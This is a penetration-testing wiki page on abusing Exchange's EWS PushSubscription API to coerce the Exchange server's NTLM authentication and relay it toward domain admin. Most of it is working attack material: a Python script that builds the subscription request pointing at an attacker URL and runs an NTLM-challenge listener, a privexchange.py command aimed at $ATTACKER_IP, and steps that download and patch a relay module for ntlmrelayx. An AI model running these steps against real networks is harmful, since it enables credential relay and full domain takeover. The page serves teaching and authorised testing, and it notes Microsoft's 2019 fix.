PushSubscription abuse

Theory

"PushSubscription" is an Exchange Web Services (EWS) API that lets a mailbox owner subscribe to push notifications: Exchange will POST events for the mailbox to a URL supplied by the caller. Attackers abuse it by supplying a URL they control, so that the Exchange server connects out to a host of their choosing and, when challenged, authenticates with its computer account. Exchange servers have historically held high privileges in the domain (e.g. WriteDacl on the domain object, see Abusing ACLs), so the coerced authentication can be relayed and abused to obtain domain admin privileges (see NTLM Relay and Kerberos Unconstrained Delegation).
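The following is an added example, not code from the original page or from PrivExchange itself. It shows the three moving parts of the abuse: the EWS Subscribe request that registers a push subscription pointing at the attacker's URL, the Subscribe response Exchange returns on success, and a minimal listener that answers the push callback with a 401 NTLM challenge so the Exchange server authenticates to it (ntlmrelayx does that part in the real attack and relays the NTLM messages onward). The attacker URL, the sample response and the sample NTLM header are constructed placeholders; the SOAP element names follow the public EWS schema, and the helper names are this example's own.

```python
# Added example: builds the EWS PushSubscriptionRequest, parses Exchange's
# Subscribe response, and shows the callback side. Not PrivExchange's code.
import base64
import struct
import xml.etree.ElementTree as ET
from http.server import BaseHTTPRequestHandler, HTTPServer
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
EWS_T = "http://schemas.microsoft.com/exchange/services/2006/types"
EWS_M = "http://schemas.microsoft.com/exchange/services/2006/messages"


def build_push_subscription(attacker_url, status_frequency=1, server_version="Exchange2013"):
    """SOAP body for an EWS Subscribe call asking Exchange to push events about
    every folder of the caller's mailbox to attacker_url. StatusFrequency is in
    minutes and 1 is the minimum, so the server calls back almost immediately."""
    return f"""<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="{SOAP_NS}" xmlns:t="{EWS_T}" xmlns:m="{EWS_M}">
  <soap:Header>
    <t:RequestServerVersion Version="{server_version}"/>
  </soap:Header>
  <soap:Body>
    <m:Subscribe>
      <m:PushSubscriptionRequest SubscribeToAllFolders="true">
        <t:EventTypes>
          <t:EventType>NewMailEvent</t:EventType>
          <t:EventType>CreatedEvent</t:EventType>
          <t:EventType>ModifiedEvent</t:EventType>
        </t:EventTypes>
        <t:StatusFrequency>{int(status_frequency)}</t:StatusFrequency>
        <t:URL>{escape(attacker_url)}</t:URL>
      </m:PushSubscriptionRequest>
    </m:Subscribe>
  </soap:Body>
</soap:Envelope>
""".encode()


def push_url_in_request(body):
    """Read the callback URL back out of a built request (sanity check before sending)."""
    return ET.fromstring(body).findtext(f".//{{{EWS_T}}}URL")


def parse_subscribe_response(body):
    """Extract the outcome of a Subscribe call from Exchange's SOAP response."""
    msg = ET.fromstring(body).find(f".//{{{EWS_M}}}SubscribeResponseMessage")
    if msg is None:
        raise ValueError("no SubscribeResponseMessage in response")
    return {
        "response_class": msg.get("ResponseClass"),
        "response_code": msg.findtext(f"{{{EWS_M}}}ResponseCode"),
        "subscription_id": msg.findtext(f"{{{EWS_M}}}SubscriptionId"),
        "watermark": msg.findtext(f"{{{EWS_M}}}Watermark"),
    }


# Constructed sample of a successful Subscribe response (ids are made up).
SAMPLE_RESPONSE = b"""<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <m:SubscribeResponse xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
      <m:ResponseMessages>
        <m:SubscribeResponseMessage ResponseClass="Success">
          <m:ResponseCode>NoError</m:ResponseCode>
          <m:SubscriptionId>EXAMPLE-SUBSCRIPTION-ID</m:SubscriptionId>
          <m:Watermark>EXAMPLE-WATERMARK</m:Watermark>
        </m:SubscribeResponseMessage>
      </m:ResponseMessages>
    </m:SubscribeResponse>
  </s:Body>
</s:Envelope>"""


def ntlm_message_type(authorization_header):
    """NTLMSSP message type (1 negotiate, 2 challenge, 3 authenticate) carried in an
    'Authorization: NTLM <base64>' header, or None if the header is not NTLM."""
    scheme, _, blob = authorization_header.partition(" ")
    if scheme.upper() != "NTLM":
        return None
    raw = base64.b64decode(blob)
    if len(raw) < 12 or raw[:8] != b"NTLMSSP\x00":
        return None
    return struct.unpack("<I", raw[8:12])[0]


# Constructed NTLM Type 1 (negotiate) header: signature, type=1, zeroed fields.
SAMPLE_TYPE1_HEADER = "NTLM " + base64.b64encode(b"NTLMSSP\x00\x01\x00\x00\x00" + b"\x00" * 24).decode()


class PushChallengeHandler(BaseHTTPRequestHandler):
    """Callback side: reply 401 + WWW-Authenticate: NTLM so the Exchange computer
    account starts NTLM against us. A relay would forward the Type 1 to the real
    target and hand the target's Type 2 back; this handler only records types."""
    received = []

    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))
        auth = self.headers.get("Authorization")
        if auth is not None:
            self.received.append(ntlm_message_type(auth))
        self.send_response(401)
        self.send_header("WWW-Authenticate", "NTLM")
        self.send_header("Content-Length", "0")
        self.end_headers()


def serve(bind="0.0.0.0", port=80):
    """Start the callback listener (blocking); the push URL must point here."""
    HTTPServer((bind, port), PushChallengeHandler).serve_forever()
```

Sending the request still needs NTLM-authenticated HTTP to `/EWS/Exchange.asmx` with a user that owns a mailbox, which is what PrivExchange handles; the listener must be reachable from the Exchange server on the URL you put in `t:URL`.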

Practice

PrivExchange (Python) logs in to Exchange Web Services with a set of credentials and calls that API. The account used must own a mailbox, and the attacker host passed with -ah must be reachable from the Exchange server, since that is where the push notification (and the coerced authentication) is sent.

privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGET
When the tester has no credentials, it is still possible to relay someone else's authentication to EWS and make the API call on their behalf (the relayed user must have a mailbox).
The modified httpattack.py from the PrivExchange repository can be dropped into ntlmrelayx.py to perform this attack. The attacker URL is hard-coded in the script and must be edited before reinstalling impacket.
cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/
mv httpattack.py httpattack.py.old
wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py
sed -i "s|attacker_url = .*|attacker_url = \"$ATTACKER_URL\"|" httpattack.py
cd /PATH/TO/impacket
pip3 install .
ntlmrelayx.py -t https://exchange.server/EWS/Exchange.asmx
On February 12th 2019, Microsoft released updates for Exchange that resolved both halves of the problem:
    the coerced authentication issue (push notifications no longer hand the Exchange server's authentication to the subscriber's URL)
    the excessive permissions Exchange held in the domain, which had let a relayed authentication turn into a full domain compromise.

References

Abusing Exchange: One API call away from Domain Admin (dirkjanm.io)